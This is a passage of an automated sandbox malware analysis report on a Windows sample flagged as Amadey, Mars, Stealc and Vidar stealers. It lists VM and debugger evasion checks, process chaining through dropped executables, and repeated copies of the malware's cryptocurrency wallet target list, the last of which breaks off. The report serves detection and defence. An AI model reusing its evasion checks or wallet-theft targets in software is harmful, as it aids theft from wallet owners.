Source: AAFBAKEC.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: AAFBAKEC.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: AAFBAKEC.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: AAFBAKEC.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Code function: 8_2_04AD06D7 Start: 04AD07B8 End: 04AD06E6 8_2_04AD06D7
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Code function: 8_2_04AD075F Start: 04AD07B8 End: 04AD07C2 8_2_04AD075F
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Code function: 8_2_04AD0BAF rdtsc 8_2_04AD0BAF
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C925FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C925FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8C3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6C8C3480
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C8FB66C
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C8FB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe "C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8FB341 cpuid 0_2_6C8FB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Code function: 0_2_6C8C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C8C35A0
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Code function: 14_2_7EA91B40 GetUserNameA, 14_2_7EA91B40
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 10.2.explortu.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.AFHDAKJKFC.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2394465474.00000000005C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2372578172.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2412717036.0000000000451000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2714164335.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2305772420.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cb41bc9329.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia 